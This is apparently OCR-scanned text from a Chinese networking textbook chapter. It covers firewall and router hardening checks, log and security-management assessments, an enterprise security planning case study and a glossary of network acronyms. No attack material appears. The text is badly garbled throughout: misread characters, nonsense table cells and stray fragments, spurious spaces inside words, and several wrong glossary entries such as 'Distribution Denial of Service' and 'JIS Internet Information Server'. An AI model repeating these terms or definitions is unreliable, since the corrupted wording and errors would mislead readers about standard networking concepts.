根据 制定 的 防火 墙 基本 配置 方案 ,配置 防火 墙 的 NAT 方式 .一 对 NAT 
防火 丧 NAT 方式 配置 | 及 着 人 
、 测试 防火 墙 是 否 支持 透明 方式 以 及 有 无 局 限 性 ,配置 透明 方式 和 NAT 方 
防火 载 透明 方式 配置 | 式 是 否 能 够 同时 使 用 
检查 防火 墙 是 否 支持 带宽 管理 及 其 管理 协议 和 方式 ,制定 防火 墙 基本 配置 
防火 载 带宽 管理 配置 | 方案 ,按照 相应 的 方式 配置 防火 墙 
检查 防火 墙 系统 管理 的 协议 及 其 安全 性 ,并 通过 相应 的 系统 管理 界面 ,根据 
防火 墙 系统 管理 配置 。 。 | 制定 的 防火 墙 基本 配置 方案 对 防火 墙 进行 管理 
同人 册 克 AI 。 | 检查 防火 二 天 级 方式 及 其 可 区 性 ,根据 制定 的 防火 六 基 本 配 轩 方案 ,利用 相 


应 升级 方式 对 防火 墙 进行 软件 升级 


。 路 由 器 的 增强 安全 设置 列表 如 表 13-8 所 示 。 


表 13-8 路 由 器 安全 增强 配置 


服务 名 称 服务 内 容 
Global 服务 配置 通过 考察 骨干 结 点 上 的 骨干 路 由 配置 情况 ,结合 实际 需求 ,打开 某 些 必要 的 服务 
2 或 者 是 关闭 一 些 不 必要 的 服务 。 例 如 : no service finger 
根据 制定 好 的 基本 配置 方案 对 路 由 器 进行 配置 检查 , 删 去 某 些 不 必要 的 ip 特 
Interface 服务 配置 


性 ,诸如 : no ip redirects 


Login banner 配置 


修改 login banner, 隐 藏 路 由 器 系统 真实 信息 


Ident 配置 


通过 ident 配置 来 增加 路 由 器 安全 性 


Ingress 和 Egress 路 
由 过 滤 


在 边界 路 由 器 上 配置 ingress 和 egress 


Unicast RPF 配置 


通过 配置 unicast RPF, 保 护 ISP 的 客户 来 增强 ISP 自身 的 安全 性 。 对 服务 提供 
Single Homed 租用 线 客户 .PSTN/ISDN/xDSL 客户 或 是 Multihomed 租用 线路 
客户 的 Unicast RPF 配置 


配置 临近 路 由 器 验证 协议 ,以 确保 可 靠 性 路 由 信息 的 交换 ,可 以 配置 明文 验证 或 


禾 由 要 次 取 证 民 时 是 MD5 验证 ,来 加 密 
vty 访问 配置 配置 vty 的 访问 方式 ,如 SSL 来 增加 系统 访问 的 安全 性 
5. 日 志 与 统计 


日 志 、 统 计 是 否 完整 ,详细 是 计算 机 网 络 系统 安全 的 一 个 重要 内 容 , 是 为 管理 人 员 及 时 
发 现 、 解 决 问题 的 保证 。 


1) 评估 说 明 
评估 时 间 : 2011 


年 07 月 30 日 下 午 


评估 地 点 : 中 心机 房 
评估 方式 : 软件 检测 和 人 工分 析 
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2) 评估 内 容 

参考 如 表 13-9 所 示 的 内 容 进 行 。 

表 13-9 ”日志 与 统计 安全 评估 
安全 风险 


编号 项 目 详细 说 明 
高 中 低 


涡 蛤 | 暇 | 工 
总 卫生 让 


3) 评估 分 析 报 告 

Web/Printer Server 和 Proxy Server 等 服务 器 或 重要 的 设备 是 否 设置 了 对 事件 日 志 进 
行 审核 记录 ,这 些 数据 保存 的 期 限 , 系 统 日 志 的 存储 是 否 存在 漏洞 等 。 

4) 建议 

系统 是 否 经 常 到 微软 网 站 上 下 载 最 新 的 各 种 补丁 ,然后 对 事件 日 志 进 行 设 置 , 对 较 长 时 
间 的 各 种 信息 进行 记录 。 

6. 安全 保障 措施 

安全 保障 措施 是 对 以 上 各 个 层次 的 安全 性 提供 保障 机 制 ,以 用 户 单位 网 络 系统 的 特点 、 
实际 条 件 和 管理 要 求 为 依据 ,利用 各 种 安全 管理 机 制 ,为 用 户 综合 控制 风险 、 降 低 损 失 和 消 
耗 , 提 高 安全 生产 效益 。 为 安全 保障 措施 设置 的 机 制 有 以 下 几 方 面 。 

1) 评估 说 明 

评估 时 间 : 2011 年 07 月 29 日 下 午 

评估 地 点 : 中 心机 房 

评估 方式 : 人 工分 析 

2) 评估 内 容 

参考 如 表 13-10 所 示 的 内 容 进 行 。 

表 13-10 安全 保障 措施 安全 评估 


安全 风险 
编号 项 目 详细 说 明 
高 中 低 


人 员 管 理 
机 房 及 设备 管理 
文档 管理 


必 |w| 忆 | 


3) 评估 分 析 报 告 
。 网 络 信息 中 心 管理 人 员 是 否 太 少 。 
。 设备 间 、 网 管 室 和 值班 室 是 否 在 一 个 办 公 室内 。 这 样 为 网 络 设备 的 管理 造成 了 非常 
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4) 


7。 


严重 的 不 安全 隐患 。 

各 种 系统 文档 是 否 健全 ,健全 的 文档 可 以 为 今后 做 好 系统 维护 提供 保障 。 该 企业 有 
没有 健全 的 文档 管理 制度 ,各 种 系统 集成 文档 是 否 完整 等 。 

机 房 设 备 的 管理 是 否 规范 。 

建议 

安全 管理 。 安 全 组 织 或 安全 负责 人 职责 如 下 : 保障 本 部 门 计算 机 系统 的 安全 运行 ; 
制定 安全 管理 的 方案 和 规章 制度 ; 定期 检查 安全 规章 制度 的 执行 情况 ,提出 改进 措 
施 ; 掌握 系统 运行 的 安全 情况 ,收集 安全 记录 ,及 时 发 现 薄 弱 环节 ,研究 和 采取 相应 
的 对 策 ,并 及 时 了 予以 改进 ; 负责 系统 工作 人 员 的 安全 教育 和 管理 ; 向 安全 监督 机 关 
和 上 一 级 主管 部 门 报告 本 系统 的 安全 情况 。 

计算 机 工作 人 员 责 任 : 应 规定 计算 机 工作 人 员 职 责 ( 内 容 包 括 : 硬件 值班 人 员 职 责 、 
硬件 维修 人 员 条 件 .操作 人 员 须 知 ); 计算 机 工作 人 员 必 须 严格 遵守 有 关 规 定 和 本 
系统 的 安全 规章 制度 ,维护 本 系统 的 安全 。 

计算 机 系统 的 维护 应 制定 计算 机 系统 维护 计划 ,确定 维护 检查 的 实施 周期 。 计算机 
系统 的 维护 分 为 预防 维护 和 故障 维护 。 预 防 维护 应 定期 进行 ,故障 维护 应 及 时 分 析 
原因 找 出 问题 ,尽快 恢复 ,并 认真 填写 维护 记录 。 计 算 机 系统 各 设备 (包括 主 处 理 机 、 
主 存储 器 、 磁 盘 机 等 ) 应 定期 检查 维护 。 计 算 机 系统 维护 时 ,对 数据 应 采取 妥善 的 保护 
措施 。 计 算 机 系统 要 定期 进行 故障 统计 分 析 。 必 须 建立 计算 机 系统 的 维护 档案 。 
机 房 的 监视 。 计 算 机 机 房 应 视 具 体 情 况 设置 监视 设备 ,及 时 发 现 异 常 状态 ,根据 不 
同 的 使 用 目的 可 配备 以 下 监视 设备 : 红外 线 传感器 ; 自动 火灾 报警 器 ; 漏水 传 感 
器 ; 温 湿度 传感器 ; 监视 摄像 机 ; 安全 人 员 应 随时 对 机 房 进行 巡视 ,注意 发 现 产生 
和 危险、 故障 的 征兆 及 其 原因 ,检查 防 灾 防 范 设备 的 功能 等 。 

人 身 安全 及 教育 培训 。 计 算 机 机 房 的 布局 应 为 工作 人 员 创 造 一 个 良好 的 人 机 工作 
环境 。 长 期 从 事 计算 机 工作 的 人 员 ,应 有 劳保 措施 ,并 定期 检查 身体 。 在 使 用 说 明 
书 中 应 有 操作 ,维护 的 安全 注意 事项 ,并 在 危险 部 位 标 以 危险 符号 和 警告 标记 。 所 
有 对 地 的 电压 (交流 峰值 或 直流 ) 大 于 42. 2V 的 易 触 及 部 分 , 均 应 加 以 安全 保护 。 
应 定期 对 使 用 人 员 进 行 安全 教育 及 培训 。 

评估 结果 


通过 模拟 用 户 行为 ,对 以 上 指标 进行 现场 测试 ,不 仅 能 够 了 解 用 户 对 网 络 安全 质量 的 真 


,还 能 够 对 现场 测试 结果 进行 综合 评估 ,从 用 户 体验 的 角度 对 网 络 安全 进行 全 面 评 


价 ,为 各 个 方面 建立 安全 策略 ,形成 安全 制度 ,并 通过 培训 和 促进 措施 ,保证 各 项 安全 管理 制度 
落 到 实处 。 最 后 根据 总 体 评估 的 结果 , 写 出 评估 分 析 报 告 ,包括 防火 墙 安全 的 评估 、 路 由 器 配 
置 的 评估 ,在 此 基础 上 得 出 结论 ,说 明 该 企业 的 网 络 信息 系统 的 安全 是 否 存在 严重 漏洞 。 


13.6 大 型 企业 网 络 安全 规划 设计 实例 


本 节 通 过 一 个 具体 案例 介绍 企业 网 络 安全 规划 设计 的 具体 实施 ,包括 安全 规划 设计 原 
则 ,策略 的 制定 、 各 种 安全 技术 ,如 防火 墙 技 术 、VPN 技术 、 加 密 技 术 、 认 证 技术 和 访问 控制 
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等 综合 应 用 。 
13.6.1 项 目 概况 


1. 项 目 背 景 

某 大 型 企业 有 6 个 子 公司 ,各 子 公司 的 业务 通过 一 个 信息 平台 进行 统一 管理 .协调 
处 理 。 

2. 建设 目标 

实现 现代 化 网 络 办 公 , 提 供 信息 共享 和 交流 的 环境 ,协同 工作 的 能 力 , 保 证 公司 业务 的 
有 序 进行 ,产生 增值 效应 。 

3. 系统 安全 建设 的 意义 

满足 业务 应 用 需要 ,根本 上 解决 企业 安全 问题 ,营造 一 个 安全 的 企业 网 络 环境 ,提供 整 
体 安 全 实施 策略 。 


13.6.2 需求 分 析 


1. 网 络 系统 基本 需求 

(1) 多 业务 的 承载 能 力 和 可 靠 的 网 络 性 能 。 

(2) 先进 的 流量 管理 能 力 和 合理 分 配 网 络 资源 。 

(3) 灵活 的 组 网 能 力 和 服务 质量 保证 。 

(4) 能 够 提供 各 种 网 络 接 入 方式 。 

(5) 网 络 扩 展 性 好 ,能 够 方便 地 进行 网 络 扩容 或 优化 。 

(6) 支持 多 种 网 络 安全 策略 ,在 保证 网 络 系统 具有 高 度 保密 性 的 同时 ,确保 网 络 的 互联 
互通 性 。 

(7) 对 平台 的 传输 通道 加 密 和 对 传输 的 数据 进行 加 密 。 

(8) 实现 灵活 的 访问 控制 功能 和 完备 的 安全 审计 功能 。 

(9) 统一 的 网 络 管理 ,使 网 络 系 统 能 更 加 有 效 地 运行 。 

(10) 保证 企业 网 络 平台 稳定 有 效 地 运行 ,能 快速 解决 出 现 的 故障 ,确保 该 系统 的 运行 ， 
节省 运营 资金 。 

2. 安全 保障 体系 需求 

企业 网 络 安全 保障 体系 需求 主要 包括 如 下 几 个 方面 。 

(1) 建立 完备 的 备份 .恢复 机 制 。 

(2) 合理 划分 安全 域 .控制 用 户 的 访问 区 域 与 权限 。 

(3) 提供 多 种 数据 传输 模式 ,优先 使 用 国产 设备 和 软件 。 

(4) 建立 计算 机 病毒 防护 体系 ,建立 统一 的 身份 认证 机 制 。 

(5) 加 强 对 安全 事件 的 检测 和 审计 .建立 完善 的 安全 保障 组 织 机 构 ,建立 完善 的 安全 管 
理 机 制 ,建立 完善 的 安全 管理 咨询 .评估 规划、 实施 及 培训 制度 。 
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13.6.3 设计 方案 


1. 安全 体系 结构 分 析 


1) 物理 安全 

网 络 的 物理 安全 主要 是 指 地 震 、 水 灾 、 火 灾 等 环境 事故 ; 电源 故障 ,人 为 操作 失误 或 错 
误 , 设 备 被 资 ,被 毁 ; 电磁 干扰 ,线路 截获 ,以 及 高 可 用 性 的 硬件 、 双 机 多 元 余 的 设计 、 机 房 环 
境 及 报警 系统 、 安 全 意识 等 。 它 是 整个 网 络 系统 安全 的 前 提 , 在 这 个 企业 网 络 内 ,由 于 网 络 
的 物理 跨度 大 ,只 制定 健全 的 安全 管理 制度 是 不 够 的 ,还 要 做 好 备份 ,并 且 加 强 网 络 设备 和 
机 房 的 管理 。 

2) 网 络 安全 

网 络 安全 指 在 数据 传输 和 网 络 连接 方面 存在 的 安全 隐患 。 涉 及 的 方面 包括 : 数据 传输 
安全 和 网 络 边界 安全 。 

3) 系统 安全 

系统 安全 指 企 业 网 络 所 采用 的 操作 系统 、 数 据 库 及 相关 商用 软件 产品 的 安全 漏洞 和 计 
算 机 病毒 对 应 用 系统 造成 的 威胁 。 涉 及 的 方面 包括 : 系统 漏洞 风险 ,病毒 入侵 风险 和 非法 
入 侵 风 险 。 

4) 应 用 安全 

应 用 安全 指 角 色 及 用 户 管 理 、 身 份 认 证 ,权限 管理 和 数据 传输 等 方面 的 安全 威胁 。 涉 及 
的 方面 包括 : 角色 管理 ,用户 管理 .授权 管理 ,用户 认证 和 数据 安全 。 

5) 网 络 管理 安全 

网 络 管理 安全 涉及 的 方面 包括 : 组 织 管理 ,制度 管理 .人 员 管 理 和 安全 审计 系统 。 

2. 安全 方案 设计 

1) 整体 方案 

企业 网 络 的 管理 信息 平台 分 为 : 内 部 平台 和 外 部 平台 。 其 中 内 部 平台 为 数据 中 心 , 外 
部 平台 为 信息 平台 的 使 用 者 和 项 目 参与 方 , 企 业 网 络 管理 
信息 平台 的 组 成 示意 图 如 图 13-1 所 示 。 

2) 安全 管理 方案 外 部 网 络 

制定 健全 的 安全 管理 体制 将 是 网 络 安全 得 以 实现 的 
重要 保证 。 企 业 网 络 根据 自身 的 实际 情况 ,制定 如 安全 操 
作 流 程 、 安 全 事故 的 奖 罚 制度 ,以 及 对 安全 管理 人 员 的 考 
查 等 。 

构建 安全 管理 平台 将 会 降低 很 多 因为 无 意 的 人 为 因素 而 造成 的 风险 。 构 建安 全 管理 平 
台 可 以 从 技术 上 组 成 安全 管理 子 网 ,安装 集中 统一 的 安全 管理 软件 ,如 病毒 软件 管理 系统 、 
网 络 设备 管理 系统 及 网 络 安全 设备 管理 软件 。 通 过 安全 管理 平台 实现 全 网 的 安全 管理 。 

企业 内 部 应 该 经 常 对 单位 员工 进行 网 络 安全 防范 意识 的 培训 ,全 面 提高 员工 的 整体 网 
络 安全 防范 意识 。 

3. 网 络 安全 技术 方案 

网 络 安全 技术 方案 总 体 设计 结构 如 图 13-2 所 示 。 


图 13-1 管理 信息 平台 的 组 成 
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安全 目标 避 
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安全 
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访问 反 抽 k 
去 
和 
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图 13-2 网 络 安全 技术 方案 总 体 设计 结构 示意 图 


(1) 全 面 .动态 的 安全 策略 。 

全 面 的 安全 策略 包含 的 要 素 : 网 络 边界 安全 、 数 据 传输 安全 、 操 作 系 统 安全 、 应 用 服务 
器 的 安全 和 网 络 防 病毒 。 

动态 的 安全 策略 包含 的 要 素 : 内 部 网 络 人 侵 检测 和 操作 系统 入 侵 检 测 。 

实现 安全 策略 的 技术 和 产品 : 防火 墙 、 加 密 与 认证 技术 、 入 侵 检 测 系统 、 漏 洞 检测 和 网 
络 防 病 毒 产品 。 

(2) 防火 墙 与 VPN 技术 。 

防火 墙 技术 是 使 用 最 为 广泛 的 安全 技术 ,是 第 一 道 安 全 防线 ,可 以 实现 网 络 边界 安全 ， 
对 于 简单 的 网 络 ,其 安装 与 部 署 位 置 如 图 13-3 
所 示 。 

防火 墙 提供 VPN 功能 : 可 以 在 两 个 网 关上 
的 防火 墙 之 间 建 立 VPN 通道 。 

VPN 采用 4 项 技术 : 隧道 技术 、 加 /解密 技 
术 、 密 匙 管理 技术 和 身份 认证 技术 ,通过 这 些 技 
术 可 以 在 VPN 上 安全 地 传输 数据 。 图 13-3 网 络 防火 墙 简单 实例 图 

对 于 有 多 个 不 同安 全 区 域 的 企业 网 ,防火 墙 
实现 边界 安全 部 署 方案 如 图 13-4 所 示 。 

(3) 选择 和 设置 防火 墙 的 考虑 因素 包括 : 安全 性 、 配 置 便利 性 管理 的 难 易 度 、 可 靠 性 
和 可 扩展 性 。 

(4) 认证 和 加 密 技 术 : 包括 采用 数字 证 书 提供 认证 数字 证 书 的 技术 原理 。 

(5) 解决 方案 : 可 以 借助 于 证 书 认证 中 心 (CA)。 
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Mail Web DB 和 文件 其 他 应 用 
服务 器 最 务 器 服务 器 服务 器 


DMZ 
交换 机 受 保护 区 


工作 站 
内 部 受信 任 区 


图 13-4 防火墙 实现 边界 安全 方案 


(6) 和 人 侵 检测 : IDS 可 以 对 各 种 黑客 攻击 行为 实时 做 出 反应 、 考 虑 IDS 的 工作 方式 、 基 
于 主机 的 入 侵 检测 、 基 于 网 络 的 入 侵 检 测 .IDS 能 实现 动态 的 安全 要 素 。 

(7) 漏洞 检测 : 模拟 黑客 的 攻击 行为 对 内 部 网 络 或 主机 进行 扫描 ,然后 给 出 安全 漏洞 
报告 。 
网 络 防 病毒 方案 : 包括 多 层 病毒 防护 体系 .客户 端的 防 病毒 系统 .服务 器 端的 防 病毒 系 
统 、 互 联网 的 防 病毒 系统 等 。 

网 络 防护 体系 通常 分 步 实施 ,实施 步骤 如 图 13-5 所 示 。 


基本 防护 体系 | “| 加 强 防护 体系 | 完全 防护 体系 
图 13-5 网 络 防护 体系 实施 流程 图 


网 络 系 统 安全 的 规划 是 在 需求 分 析 的 基础 上 进行 技术 性 的 论证 ,把 用 户 提出 的 问题 和 
要 求 ,用 网 络 安全 方面 的 术语 表示 出 来 ,经 过 技术 方面 的 分 析 , 提 出 一 整套 网 络 系统 规划 与 
设计 的 安全 策略 和 技术 方案 。 网 络 安全 问题 不 再 单纯 是 网 络 安全 技术 的 问题 ,网 络 安 全 规 
划 与 设计 是 一 个 系统 的 复杂 工程 ,必须 精心 规划 和 设计 ,制定 一 个 科学 可 行 的 安全 规划 设计 
方案 。 


CA 
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CDMA 
CERNET 
CGI 
CHINA-NET 
CIDR 
CMIS/CMIP 
CNNIC 

CRC 

CSMA 
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Access Control List, 访 问 控制 列表 

Asymmetric Digital Subscriber Line, 非 对 称 数 字 用 户 线路 

Application Program Interface, 应 用 程序 接口 

Address Resolution Protocol, 地 址 解析 协议 

Autonomous System, 自 治 系统 

American Standard Code for Information Interchange, 美 国信 息 交 换 标准 码 

Active Server Page, 动 态 服务 器 页 面 , 是 微软 开发 的 代 蔡 CGI 脚本 程序 的 一 种 应 用 ， 
它 可 以 与 数据 库 和 其 他 程序 进行 交互 ,是 一 种 简单 方便 的 编程 工具 

Asynchronous Transfer Mode, 异 步 传 输 模 式 , 通 常 以 光纤 为 传输 介质 的 广域网 络 
Border Gateway Protocol, 边 界 网 关 协议 ,一 种 EGP 的 改进 协议 

Basic Rate Interface, 基 本 速率 接口 

Certificate Authority, 证 书 管理 机 构 

International Telephone and Telegraph Consultative Committee ,国际 电报 与 电话 咨询 
委员 会 ,总 部 在 日 内 瓦 ,ITU 分 支 机 构 

Code Division Multiple Access, 码 分 多 址 ,一 种 根据 帧 分 配 信 道 的 数字 通信 技术 
China Education and Research NETwork, 中 国教 育 科 研 网 

Common Gateway Interface, 公 共 网 关 接 口 ,用 于 处 理 表格 (表单 ) 数 据 的 标准 

China Network, 中 国 公 用 计算 机 互联 网 

Classless InterDomain Routing ,无 类 别 域 间 路 由 选择 

the Common Management Information Service/ Protocol, 公 共管 理 信息 服务 和 协议 
China Internet Network Information Center, 中 国 互 联网 络 信息 中 心 

Cyclic Redundancy Check ,循环 宛 余 校 验 

Carrier Sense Multiple Access, 载 波 侦 听 多 路 访问 

Carrier Sense Multiple Access with Collision Detection, 带 冲突 检测 的 载波 侦 听 多 路 
访问 

Data Circuit-terminating Equipment ,数据 电路 终端 设备 

Digital Data Network ,数字 数据 网 

Distribution Denial of Service, 分 布 式 拒 绝 服务 攻击 

Data Encryption Standard ,数据 加 密 标准 

Dynamic Host Configuration Protocol, 动 态 主 机 配置 协议 

Data Link Controller, 数 据 链 路 控制 器 

DeMilitarized Zone, 隔 离 区 或 非 军事 化 区 

Data Link Layer, 数 据 链 路 层 

Domain Name Service, 域 名 系统 ,为 互联 网 规划 名 称 的 系统 

Denial of Service, 拒 绝 服务 攻击 

Data Terminal Equipment, 数 据 终端 设备 , 指 计算 机 

Data Terminal Ready, 数 据 终 端 就 绪 ( 信 号 ) 

Encrypting File System, 加 密 文件 系统 

Exterior Gateway Protocol, 外 部 网 关 协 议 

Electronic Industries Association, (美国 ) 电 子 工业 协会 

Enhanced Interior Gateway Routing Protocol, 增 强 型 内 部 网 关 路 由 协议 ,Cisco 公司 独 
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有 的 路 由 协议 

EPOC a new Epoch of Personal Convenience,Psion Software 推出 的 操作 系统 

ESP Encapsulating Security Payload, 封 装 安 全 载荷 

FAT File Allocating Table, 文 件 分 配 表 

F/R Frame Relay, 帧 中 继 , 一 种 虚拟 的 永久 虚 电 路 的 租用 线路 

FCS Frame Check Sequence, 帧 校 验 码 序 列 

FDDI Fiber Distributed Data Interface, 光 纤 分 布 式 数据 接口 

FDM Frequency Division Multiplexing, 频 分 多 路 复 用 

FTP File Transfer Protocol, 文 件 传输 协议 

GPS Global Position System, 全 球 定 位 系统 

GUI Graphical User Interface, 图 形 用 户 界面 [接口 ]( 软 件 ) 

HA High Availability, 高 可 用 性 

HDLC High-level Data Link Control ,高 级 数据 链 路 控制 协议 

HTML HyperText Markup Language, 超 文本 标注 语言 

HTTP HyperText Transfer Protocol, 超 文本 传输 协议 

ICMP Internet Control Message Protocol, 因 特 网 控制 消息 协议 

IDS Intrusion Detection System, 人 侵 检 测 系统 

IEEE Institute of Electrical and Electronics Engineers, 电 气 和 电子 工程 师 协会 ,世界 上 最 大 
专业 化 组 织 

IETF Internet Engineering Task Force, 因 特 网 工程 特别 任务 组 

IGMP Internet Group Management Protocol, 互 联网 组 管理 协议 

IGP Interior Gateway Protocol, 内 部 网 关 协 议 

IGRP Internet Gateway Routing Protocol, 互 联网 路 由 网 关 协 议 

JIS Internet Information Server, 因 特 网 信息 服务 系统 

IPS Intrusion Prevention System, 人 入侵 预防 系统 

IPSec Internet Protocol Security, 网 际 ( 间 ) 协 议 安全 (性 ) 协 议 

IPv4 Internet Protocol version 4.0, 第 4.0 版 网 际 协议 (32 位 地 址 空间 ) 

IPv6 Internet Protocol version 6.0, 第 6.0 版 网 际 协议 (128 位 地 址 空间 ) 

IPX Internetwork Packet eXchange, 互 联网 包 交 换 

ISDN Integrated Services Digital Network, 综 合 业务 数字 网 ,可 同时 提供 数据 和 语音 服务 的 
网 络 

区 5 Intermediate System to Intermediate System Routing Protocol, 中 间 系 统 对 中 间 系 统 的 
路 由 选择 协议 

ISO International Standards Organization, 国际 标准 化 组 织 ,1946 成 立 的 自愿 的 非 条 约 
组 织 

ISP Internet Service Provider, 因 特 网 服务 提供 商 

ITU International Telecommunication Union, 国 际 电信 联盟 

ITU-T ITU-Telecommunications Standardization Section ,国际 电信 联盟 电信 标准 部 

ITU-U Telecommunication Standardisation Sector of the ITU, 国 际 电气 通信 联盟 电气 通信 标 
准 化 部 门 

LAN Local Area Network ,局 域 网 

LDAP Lightweight Directory Access Protocol, 轻 量 目录 访问 协议 

LLC Logical Link Control, 人 逻辑 链 路 控制 ( 子 层 )IEEE802 

MAC Medium Access Control, 介 质 访问 控制 ( 子 层 )IEEE802 

MAN Metropolitan Area Network, 城 域 网 

MD5 Message-Digest Algorithm 5 ,信息 -摘要 算法 5 

MFTP Multisource File Transfer Protocol, 多 源 文 件 传输 协议 
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MIB 
MMF 
MPLS 
MRTG 
MTBF 
MTTR 
NAI 
NAMS 
NAS 
NAS 
NAT 
NDS 
NetBIOS 
NFS 
NII 
NIS 
NOS 
NS 
NTFS 
OSI/RM 
OSPF 
OTDR 
P2P 
PDNS 
PDU 
PGP 
PING 
PKI 
POP 
PPP 
PSTN 
QA 
QoS 
RAID 


RARP 
RFC 


RIP 
RMON 
RPC 
RS232 


RSA 
RSVP 


Management Information Base, 管 理 信 息 库 

MultiMode Fiber, 多 模 光 纤 

Moultiple Protocol Label Switching, 多 协议 标记 交换 (技术 ,方法 ,标准 ) 
Multi Router Traffic Grapher, 多 路 由 器 流量 图 形 生成 器 

Mean Time Between Failures, 平 均 无 故障 时 间 间 隔 

Mean Time To Repair, 平 均 修 复 时 间 

Network Associates，Inc. , (美国 ) 网 络 联盟 公司 

Network Analysis Management System, 网 络 分 析 管 理 系 统 

Network Attached Storage, 网 络 附加 存储 

Network Access Server, 网 络 访问 服务 器 

Network Address Translation, 网 络 地 址 转换 

Network Directory Service, 网 络 目录 服务 

Network Basic Input/Output System, 网 络 输入 /输出 系统 

Network File System, 网 络 文件 系统 

National Information Infrastructure, 美 国 国家 信息 基础 设施 

Network Information Service, 网 络 信息 服务 

Network Operating System, 网 络 操作 系统 

Network Simulation ,网 络 仿真 

New Technology File System ,新 技术 文件 系统 

Open System Interconnection/Reference Model, 开 放 系 统 互 连 参 考 模型 
Open Shortest Path First, 开 放 最 短路 径 优先 协议 

Optical Time Domain Reflector-meter, 光 时 域 反 射 计 

Peer to Peer (Communication) ,对 等 通信 ,通信 的 各 计算 机 平等 或 对 等 
Public Data Networks, 公 用 数据 网 

Protocol Data Unit, 协 议 数据 单元 

Pretty Good Privacy, 相 当 好 的 保密 性 ,一 种 对 电子 邮件 加 密 的 方法 
Packet Internet Gopher, 乒 协议 (发 送信 息 包 测 试 计算 机 是 否 连 通 因特网 的 协议 ) 
Public Key Infrastructure, 公 钥 基 础 设施 

Post Office Protocol, 邮 局 协议 ,从 远程 读 取 电子 邮件 的 简单 协议 
Point-to-Point Protocol, 点 到 点 协议 ,用 于 互联 网 用 户 通过 Modem 拨 入 
Public Switched Telephone Network, 公 用 电话 交换 网 

Quality Assurance, 质 量 保 证 

Quality of Service, 服 务 质量 

Redundant Array of Inexpensive Disks ,廉价 磁盘 宛 余 阵 列 , 有 Raid 0,1,2,3,4,5,10， 
30,50 等 

Reverse address resolution protocol, 反 向 地 址 解析 协议 

Request for Comment, 

请 求 注释 ,Internet 上 研究 和 开发 团体 的 工作 文档 ,从 会 议 报告 到 标准 规范 
Routing Information Protocol, 路 由 信息 协议 

Remote Network Monitoring ,远程 网 络 监控 

Remote Procedure Call Protocol ,远程 过 程 调 用 协议 

Recommended Standard 232， 

[LEIA] 第 232 号 推荐 标准 (关于 采用 串 行 二 进 制 数据 交换 的 数据 终端 设备 与 数据 通信 
设备 之 间接 口 的 标准 ) 

Rivest,Shamir 和 Adleman, 一 种 公 钥 加 密 方法 

Resource Reservation Protocol， 


资源 重复 利用 (资源 预 留 ) 协 议 ,一 种 解决 拥塞 的 路 由 协议 
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SAN Storage Area Network ,存储 区 域 网 络 

SAP Service Access Point, 服 务 接 人 点 

SCSI Small Computer System Interface, 小 型 计算 机 系统 接口 

SDH Synchronous Digital Hierarchy, 同 步 数 字 分 级 结构 

SLIP Serial Line Internet Protocol, 串 行 线路 网 际 协议 

SMF Single Mode Fiber, 单 模 光 纤 

SMTP Simple Mail Transfer Protocol, 简 单 邮件 传输 协议 

SNMP Simple Network Management Protocol, 简 单 网 络 管理 协议 

SONET Synchronous Optical Network ,同步 光纤 网 络 

SPX Sequenced packet exchange, 顺 序数 据 包 交 换 

STP Shielded Twisted Pair, 屏 项 双 绞 线 

SYN Synchronize, 是 TCP/IP 建立 连接 时 使 用 的 握手 信号 

TCP Transmission Control Protocol, 传 输 控制 协议 ,一 种 面向 连接 的 协议 

TDM Time Division Multiplexing, 时 分 多 路 复 用 

TDR Time Domain Reflectometer, 时 域 反 射 计 

TIA Telecommunication Industries Association, (美国 ) 电 信行 业 协 会 

TT Time to Live, 生 存 时 间 ,在 数据 报 建立 时 指定 一 整数 TTL 值 ,经 过 网 关 时 递减 ,为 0 
时 丢弃 

UDP User Datagram Protocol, 用 户 数据 报 协议 ,一 种 无 连接 的 协议 

UNI User Network Interface, 用 户 网 络 接口 

UPS Uniterruptible Power Supply ,不 间断 电源 

URI Uniform Resource Identifier, 统 一 资源 标识 符 

URL Uniform Resource Locator, 统 一 资源 定位 器 

USB Universal Serial Bus ,通用 串 行 总 线 

UTP Unshielded Twisted Pair, 无 屏蔽 双 绞 线 

VC Virtual Channel, 虚 通路 

VHF Very High Frequency, 其 高 频 (频率 从 30MHz 到 300MHz) 

VLAN Virtual Local Area Network, 虚 拟 局 域 网 

VLSM Variable Length Subnet Masks, 可 变 长 子 网 掩 码 

VOD Video On Demand ,视频 点 播 

VoIP Voice over IP, 在 IP 之 上 传送 话音 

VPN Virtual Private Network ,虚拟 专 用 网 

WAN Wide Area Network, 广 域 网 

WCDMA Wideband Code Division Multiple Address, 宽 带 码 分 多 址 

WDM Wavelength Division Multiplexing, 波 分 多 路 复 用 

WDMA Wavelength Division Multiple Access, 波 分 多 路 访问 

WEP Wired Equivalency Protocol, 有 线 等 效 协 议 

WINS Windows Internet Naming Service Windows, 视 窗 系统 因特网 命名 服务 (程序 ,软件 ) 

WLAN Wireless Local Area Network ,无线 局 域 网 络 

WPA Wireless Protection Access, 无 线 保护 访问 协议 

WWW World Wide Web [Internet], 万 维 网 ,环球 网 

xDSL Any Digital Subscriber Link, 


任何 数字 用 户 链 路 ,DSL 的 不 同 派生 技术 (x 可 以 是 A,C,E,H,I,RA,S,U,V 等 ) 
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